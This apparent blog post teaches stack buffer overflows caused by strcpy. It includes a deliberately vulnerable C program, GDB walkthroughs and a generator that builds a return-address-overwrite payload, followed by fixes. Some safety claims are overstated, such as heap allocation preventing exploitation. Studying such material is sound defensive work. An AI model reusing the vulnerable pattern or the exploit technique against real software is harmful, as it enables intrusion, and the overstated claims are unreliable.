strcpy
Really?
Published: 5/6/2025
strcpy
If you have done any amount of programming in C, you have most likely heard
that you shouldn't use functions like strcpy, strcat, sprintf, etc., because
they are unsafe and easily susceptible to buffer overflow attacks. While
that is true, and fantastic advice for new programmers, like any dangerous
tool, in the hands of a trained professional there isn't much to worry
about. When talking about C/C++, people like to bring up how easy it is to
shoot yourself in the foot. In this analogy, functions like strcpy are
merely the gun; the programmer is the one who pulls the trigger. As with
firearm safety, a firearm that is handled and used properly won't hurt
anyone. Likewise, functions like strcpy, if used correctly, can't cause
buffer overflows. In this blog post, we take a look at how buffer overflows
are exploited when functions like strcpy are used without the proper safety
mechanisms, as well as how to use said functions properly to prevent buffer
overflows.
strcpy
Let's assume we have a simple C program that takes in a filename as input,
reads in that file, and then determines if the contents of that file are a
string.
NOTE: The following code to check if an unsigned char array is a string is just for demonstration purposes and has been overly simplified for brevity.
Here is what such a program could look like:
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
unsigned char *loadfile(const char *filename, size_t *size)
{
    /* Code to read in a file */
}
int is_uchar_str(unsigned char *data)
{
    char tmp[20];
    strcpy(tmp, (char *) data);
    return isalpha(tmp[0]);
}
int main(int argc, char **argv)
{
    unsigned char *data = NULL;
    size_t size = 0;
    if (argc < 2)
    {
        printf("Usage: %s \n", argv[0]);
        return EXIT_FAILURE;
    }
    data = loadfile(argv[1], &size);
    if (data == NULL)
        return EXIT_FAILURE;
    if (is_uchar_str(data))
        printf("String: %s\n", (char *) data);
    else
        printf("%s is binary\n", argv[1]);
    free(data);
    return EXIT_SUCCESS;
}
For brevity's sake, I have omitted the code to handle the reading in of the file. However, let us assume that the function is not susceptible to any sort of buffer overflow attack. If you haven't already found the buffer overflow, it's these lines right here:
    char tmp[20];
    strcpy(tmp, (char *) data);
The reason this can cause a buffer overflow is that we are blindly copying
data, which has an unknown size, into a fixed-size buffer. If the string in
data is 20 characters or longer, the copy (which includes the terminating
null byte) will not fit in the 20 bytes of tmp, and this will cause a buffer
overflow. This is because strcpy does not do any bounds checking to make
sure the buffer you are copying into is large enough to hold the incoming
data.
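To make the missing bounds check concrete, here is a minimal sketch of what a strcpy-style copy does. The name sketch_strcpy is hypothetical and this is not how any particular C library implements strcpy (real versions are heavily optimized), but the behavior that matters is the same: the loop stops only at the source's terminating null byte and never looks at how big the destination is.

```c
#include <stddef.h>

/* Illustrative stand-in for strcpy (hypothetical name, not a libc function). */
char *sketch_strcpy(char *dst, const char *src)
{
    size_t i = 0;

    /* Copy until the source's terminating null byte is reached.
     * Note that the capacity of dst is never consulted. */
    while (src[i] != '\0') {
        dst[i] = src[i];
        i++;
    }
    dst[i] = '\0'; /* the terminator is copied as well */

    return dst;
}
```

Because the destination size is not even a parameter, the only place a size check can live is in the caller.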
However, just because a buffer overflow can occur doesn't mean it will. Let us compile and run our program and see what happens:
$ gcc -g main.c -o main
$ ./main test
Read in 7 bytes from test
String: aaaaaa
Here, we can see we read in a file, test, and it contained six a's plus a
newline for a total of seven bytes. Obviously, 7 < 20, so there's no way a
buffer overflow could happen with this specific file.
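The same comparison can be written as code. This is a small sketch with a hypothetical helper, would_overflow, that is not part of the example program; it only spells out the arithmetic, counting the terminating null byte that strcpy also writes.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: returns 1 if strcpy(dst, src) would write past a
 * destination of dst_size bytes, and 0 if the copy fits. */
int would_overflow(const char *src, size_t dst_size)
{
    /* strcpy writes strlen(src) characters plus one null byte. */
    return strlen(src) + 1 > dst_size;
}
```

For the test file above, would_overflow("aaaaaa\n", 20) is 0, since 7 characters plus the terminator need only 8 bytes. A 20-character string would need 21 bytes and is the shortest input that overflows tmp.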
As we discussed in the section above, our example program is vulnerable to a buffer overflow attack.
In short, a buffer overflow is what happens when a program writes data to a buffer that goes beyond its allocated space and corrupts surrounding memory. Used maliciously, buffer overflows can be exploited to inject and execute arbitrary code. One of the ways this is done is by overwriting the return address of a function in order to jump to the hacker's injected code and execute it.
The reason buffer overflow attacks are so dangerous is that any code
injected by the hacker will run at the permission level of the program
itself. This means if a hacker exploits a program running with root (or
administrative) privileges, any arbitrary code they execute will also run
with those same privileges. So, if a hacker exploits a buffer overflow in a
program running as root and injects code to spawn a reverse shell, the
hacker now has free rein to do whatever they please on that system.
Let's now assume our example program has a secret function that we want to execute that we otherwise can't by using the program normally.
void secret(void)
{
    printf("This should never print\n");
}
If we didn't have the source code to see this function existed, we could
still find it by running objdump on our program.
$ objdump -d main
.
.
00000000000012a9 <secret>:
    12a9: f3 0f 1e fa             endbr64
    12ad: 55                      push %rbp
    12ae: 48 89 e5                mov %rsp,%rbp
    12b1: 48 8d 05 50 0d 00 00    lea 0xd50(%rip),%rax # 2008 <_IO_stdin_used+0x8>
    12b8: 48 89 c7                mov %rax,%rdi
    12bb: e8 60 fe ff ff          call 1120
    12c0: 90                      nop
    12c1: 5d                      pop %rbp
    12c2: c3                      ret
.
.
Here, we can see that a function named secret exists within our program but
is inaccessible to us. Since we know this program is vulnerable to a buffer
overflow, we can exploit that buffer overflow in order to have this program
run the secret function.
I have also taken a couple of preliminary steps to disable common protections like Address Space Layout Randomization (ASLR), stack canaries (StackGuard), etc. You can still perform buffer overflows with these protections enabled, but for the sake of simplicity and consistency for this demo, I have disabled them.
First, let's run our program through a debugger, like GDB, to get a sense of
the memory space and how to craft our exploit.
In GDB, if we run layout src, we can see the function we want to exploit.
So, let's add a breakpoint at line 58, right before our function returns,
and look at the current state of the stack.
(gdb) b 58
Breakpoint 1 at 0x1418: file main.c, line 58.
(gdb) r test
Starting program: /home/main test
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Read in 7 bytes from test
Breakpoint 1, is_uchar_str (data=0x55555555a490 "aaaaaa\n") at main.c:58
58 return isalpha(tmp[0]);
(gdb) x/32x $rsp
0x7fffffffe2f0: 0x00000000 0x00000000 0x5555a490 0x00005555
0x7fffffffe300: 0x61616161 0x000a6161 0x00000007 0x00000000
0x7fffffffe310: 0x5555a490 0x00005555 0x555592a0 0x00005555
0x7fffffffe320: 0xffffe350 0x00007fff 0x555554b5 0x00005555
0x7fffffffe330: 0xffffe468 0x00007fff 0x00000000 0x00000002
0x7fffffffe340: 0x00000000 0x00000000 0x5555a490 0x00005555
0x7fffffffe350: 0x00000002 0x00000000 0xf7c29d90 0x00007fff
0x7fffffffe360: 0x00000000 0x00000000 0x5555543b 0x00005555
(gdb)
What we just did was run the program with our test file and dump the
current layout of the stack at our breakpoint. On the line starting with
0x7fffffffe300, we can see our a's, since 0x61 is the ASCII encoding for a
in hexadecimal. Looking deeper, we can see that the line starting with
0x7fffffffe320 contains our return address in its last two words, at
address 0x7fffffffe328. Because x86-64 is little-endian and GDB is printing
32-bit words, the low half of the 64-bit address (0x555554b5) is shown
before the high half (0x00005555), so we have to swap the two words to read
it: our return address is 0x00005555555554b5.
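Reading a 64-bit value out of a dump of 32-bit words can be written out explicitly. This is a minimal sketch; join_words is a hypothetical helper, not part of the example program, and it assumes the two words are passed in the order GDB printed them (low word first).

```c
#include <stdint.h>

/* Hypothetical helper: rebuild a 64-bit value from the two 32-bit words
 * that a little-endian word dump shows for it. */
uint64_t join_words(uint32_t low, uint32_t high)
{
    /* The word printed second holds the upper 32 bits. */
    return ((uint64_t) high << 32) | low;
}
```

Applied to the two words in the dump, join_words(0x555554b5, 0x00005555) yields 0x00005555555554b5.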
How do we know this? We can confirm it by disassembling our main function
in GDB with disas main, which gives us this:
.
.
0x00005555555554a9 <+110>: mov -0x8(%rbp),%rax
0x00005555555554ad <+114>: mov %rax,%rdi
0x00005555555554b0 <+117>: call 0x5555555553f5 <is_uchar_str>
0x00005555555554b5 <+122>: test %eax,%eax
0x00005555555554b7 <+124>: je 0x5555555554d4
0x00005555555554b9 <+126>: mov -0x8(%rbp),%rax
.
.
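We can see that the call to the function we are currently in, is_uchar_str,
is at address 0x00005555555554b0, and the next instruction is at address
0x00005555555554b5. A call instruction pushes the address of the instruction
that follows it onto the stack as the return address, which is how we know
from our stack dump that 0x00005555555554b5 was our return address.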
All we have to do now is create a malicious file that overwrites that return
address with the address of the secret function. To find this, we can run
disas secret:
Dump of assembler code for function secret:
0x00005555555552a9 <+0>: endbr64
0x00005555555552ad <+4>: push %rbp
0x00005555555552ae <+5>: mov %rsp,%rbp
0x00005555555552b1 <+8>: lea 0xd50(%rip),%rax # 0x555555556008
0x00005555555552b8 <+15>: mov %rax,%rdi
0x00005555555552bb <+18>: call 0x555555555120
0x00005555555552c0 <+23>: nop
0x00005555555552c1 <+24>: pop %rbp
0x00005555555552c2 <+25>: ret
End of assembler dump.
Here, we can see the address of the secret function is 0x00005555555552a9,
so that is what we want to put for our return address in order to execute
the secret function.
Going back to the stack dump:
(gdb) x/32x $rsp
0x7fffffffe2f0: 0x00000000 0x00000000 0x5555a490 0x00005555
0x7fffffffe300: 0x61616161 0x000a6161 0x00000007 0x00000000
0x7fffffffe310: 0x5555a490 0x00005555 0x555592a0 0x00005555
0x7fffffffe320: 0xffffe350 0x00007fff 0x555554b5 0x00005555
0x7fffffffe330: 0xffffe468 0x00007fff 0x00000000 0x00000002
0x7fffffffe340: 0x00000000 0x00000000 0x5555a490 0x00005555
0x7fffffffe350: 0x00000002 0x00000000 0xf7c29d90 0x00007fff
0x7fffffffe360: 0x00000000 0x00000000 0x5555543b 0x00005555
We can see that there are 40 bytes between the start of our buffer (at
0x7fffffffe300) and the return address (at 0x7fffffffe328). In order to
generate our malicious file, I wrote a simple C program to generate it for
us:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(void)
{
    size_t size = 56; /* Larger than what we realistically need */
    size_t off = 0x28; /* Offset in the buffer where the return address is */
    long addr = 0x00005555555552a9; /* Address of the secret function */
    char buffer[size];
    FILE *badfile;
    /* Initialize buffer with all 'a' */
    memset(buffer, 0x61, size);
    /* Return address to overwrite (memcpy avoids an unaligned, type-punned store) */
    memcpy(buffer + off, &addr, sizeof(addr));
    /* Save the contents to the file "badfile" (binary mode, since this is raw bytes) */
    badfile = fopen("./badfile", "wb");
    if (badfile == NULL)
        return EXIT_FAILURE;
    fwrite(buffer, size, 1, badfile);
    fclose(badfile);
    return EXIT_SUCCESS;
}
NOTE: 0x28 in hexadecimal is 40 in decimal (or base 10).
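As a quick check on that offset, the subtraction can be spelled out. This is only a sketch: payload_offset is a hypothetical helper, and the two addresses are the ones read from the stack dump above (the buffer at 0x7fffffffe300 and the saved return address at 0x7fffffffe328), which will differ on another machine or build.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: number of bytes from the start of the buffer to the
 * stack slot that holds the saved return address. */
size_t payload_offset(uint64_t buffer_addr, uint64_t return_slot_addr)
{
    return (size_t) (return_slot_addr - buffer_addr);
}
```

With the values from the dump, payload_offset(0x7fffffffe300, 0x7fffffffe328) is 0x28, or 40, which is the offset the generator uses.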
Compiling and running the generator program gives us our malicious file,
badfile, which will allow us to exploit the buffer overflow and run the
secret function.
Let's run it and see what happens.
Bada bing bada boom! Our buffer overflow exploit was a success, and the
secret function was executed. In case you're curious, the reason the
Illegal instruction (core dumped) message appeared is that we did not
properly handle what happens after our exploit runs. In this basic example,
where the program would exit anyway, this doesn't really matter. However,
for more sophisticated attacks, adding in the proper handling for what
happens after the exploit would matter.
Now that we have proven we can exploit this program via a buffer overflow,
how do we fix it? Sure, you can change is_uchar_str to use strncpy, as seen
here:
/* Old */
int is_uchar_str(unsigned char *data)
{
    char tmp[20];
    strcpy(tmp, (char *) data);
    return isalpha(tmp[0]);
}
/* New */
int is_uchar_str(unsigned char *data)
{
    size_t size = 20;
    char tmp[size + 1];
    strncpy(tmp, (char *) data, size);
    tmp[size] = '\0'; /* strncpy does not terminate tmp if data is 20+ characters */
    return isalpha(tmp[0]);
}
While that would absolutely fix the problem, the point of this is to show
how you can use strcpy and still be safe. The better solution, while still
using strcpy, would be to add the size of the incoming data as a parameter.
After that, it would be best practice to allocate memory on the heap, rather
than creating a fixed-size buffer on the stack. The primary reason for this
is that the stack is much more limited in how much memory it can hold
compared to the heap. In addition, if you allocate the memory on the heap,
the hacker can't simply overrun your buffer and overwrite the return
address, like they can in our example, because the return address lives on
the stack.
With all that in mind, our new function would look something like this:
int is_uchar_str(unsigned char *data, size_t size)
{
    char *tmp = calloc(size + 1, sizeof(char));
    int ret = 0; /* 0 = false */
    if (tmp == NULL)
        return ret;
    strcpy(tmp, (char *) data);
    ret = isalpha(tmp[0]);
    free(tmp);
    return ret;
}
Since we updated our is_uchar_str function by adding an additional
parameter, we have to update our main function as well:
int main(int argc, char **argv)
{
    unsigned char *data = NULL;
    size_t size = 0;
    if (argc < 2)
    {
        printf("Usage: %s \n", argv[0]);
        return EXIT_FAILURE;
    }
    data = loadfile(argv[1], &size);
    if (data == NULL)
        return EXIT_FAILURE;
    if (is_uchar_str(data, size))
        printf("String: %s\n", (char *) data);
    else
        printf("%s is binary\n", argv[1]);
    free(data);
    return EXIT_SUCCESS;
}
With these changes, if we recompile the program (even with all the protections disabled), try as we might, we won't be able to perform a buffer overflow.
Even running our program through Valgrind, we can see we have no memory
leaks or errors.
Does that make is_uchar_str completely safe? In our example, yes; but
globally, no. If our is_uchar_str function were a part of an API or library,
it would technically still be vulnerable to a buffer overflow under the
right conditions, i.e., the same conditions that make strcpy susceptible to
a buffer overflow: negligence on behalf of the developer calling it. Let's
look at it again:
int is_uchar_str(unsigned char *data, size_t size)
{
    char *tmp = calloc(size + 1, sizeof(char));
    int ret = 0; /* 0 = false */
    if (tmp == NULL)
        return ret;
    strcpy(tmp, (char *) data);
    ret = isalpha(tmp[0]);
    free(tmp);
    return ret;
}
If the developer fails to provide the adequate size of the data coming in,
a buffer overflow can still occur. However, the same holds true if you use
strncpy or strncat, for example, just in reverse.
In our case, if the size is too small, we won't allocate enough space, and
the buffer will overflow. In the case of strncpy and strncat, if the size
you give is larger than the space available in the buffer you're
copying/concatenating into, you can still have a buffer overflow. Though,
granted, the range in which a hacker could overflow the buffer,
theoretically, would be more limited.
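To illustrate the strncpy side of that argument, here is a minimal sketch of a bounded copy whose count comes from the destination rather than from the caller's idea of the source length. The name copy_truncating is hypothetical and not part of the example program. It also handles a second pitfall: strncpy does not write a terminating null byte when the source is at least as long as the count.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copy at most dst_size - 1 characters of src into dst
 * and always terminate the result. Longer input is silently truncated. */
void copy_truncating(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0)
        return; /* no room for even a terminator */

    /* The count is derived from the destination, never from the source. */
    strncpy(dst, src, dst_size - 1);

    /* strncpy leaves dst unterminated when src has dst_size - 1 or more
     * characters, so terminate explicitly. */
    dst[dst_size - 1] = '\0';
}
```

Passing anything larger than the real capacity of dst as dst_size brings the overflow right back, which is the point made above: the bounded functions are only as safe as the size they are given.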
As we've clearly demonstrated, using functions like strcpy, strcat,
sprintf, etc., can be done without any risk of a buffer overflow occurring.
However, like we mentioned in the beginning, comparing these functions to
firearms, developers must ensure they are taking the requisite steps to
ensure their buffers are large enough to receive any incoming data. Which,
in fairness, they should be doing anyway.
One notable exception to this would be if you're working within a protocol
where messages can only be of a certain length. In which case, yes, using
strncpy would make more sense. The counterargument to that, though, is that
if messages can only be, say, 4096 bytes long, you don't even need a bounded
copy function in the first place. You can just check that the data is less
than 4096 bytes prior to performing strcpy, since anything larger is
obviously an invalid message and not worth parsing.
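A check like that could look something like the following sketch. Everything here is an assumption for illustration: the helper name store_message, the MAX_MESSAGE_SIZE constant, and the convention that msg_size is the number of bytes received, including the terminating null byte.

```c
#include <stddef.h>
#include <string.h>

#define MAX_MESSAGE_SIZE 4096 /* assumed protocol limit, terminator included */

/* Hypothetical helper: validate a received message, then copy it with strcpy.
 * Returns 0 on success and -1 if the message is not valid for the protocol. */
int store_message(char dst[MAX_MESSAGE_SIZE], const char *msg, size_t msg_size)
{
    /* Anything empty or over the protocol limit is invalid; don't parse it. */
    if (msg_size == 0 || msg_size > MAX_MESSAGE_SIZE)
        return -1;

    /* Make sure a terminator exists inside the bytes we actually received. */
    if (memchr(msg, '\0', msg_size) == NULL)
        return -1;

    /* The string is now known to fit in MAX_MESSAGE_SIZE bytes. */
    strcpy(dst, msg);
    return 0;
}
```

The memchr call matters as much as the size comparison: strcpy trusts the terminator, so the check confirms one is present before the copy rather than assuming it.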
As a final note, whenever you are working in memory-unsafe languages, like
C/C++, always verify that your buffers are large enough to receive the data
you plan to put in them prior to copying that data into said buffer,
regardless of whether you are using strcpy or strncpy. If your buffer isn't
large enough, either resize it or find another way to handle the exception,
such as returning an error code.
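As a closing illustration, both options can be combined in one small sketch: grow the buffer when it is too small, and return an error code if that fails. The helper name copy_with_resize is hypothetical, and it assumes *dst was allocated with malloc, calloc, or realloc (or is NULL with *dst_size equal to 0).

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: make sure *dst can hold src, then copy with strcpy.
 * Returns 0 on success and -1 if the buffer could not be resized. */
int copy_with_resize(char **dst, size_t *dst_size, const char *src)
{
    size_t needed = strlen(src) + 1; /* characters plus the null byte */

    if (needed > *dst_size) {
        char *grown = realloc(*dst, needed);
        if (grown == NULL)
            return -1; /* the original buffer is left untouched */
        *dst = grown;
        *dst_size = needed;
    }

    /* The buffer is now known to be large enough for the whole string. */
    strcpy(*dst, src);
    return 0;
}
```

A caller would check the return value before using the buffer, for example `if (copy_with_resize(&buf, &buf_size, input) != 0) return EXIT_FAILURE;`.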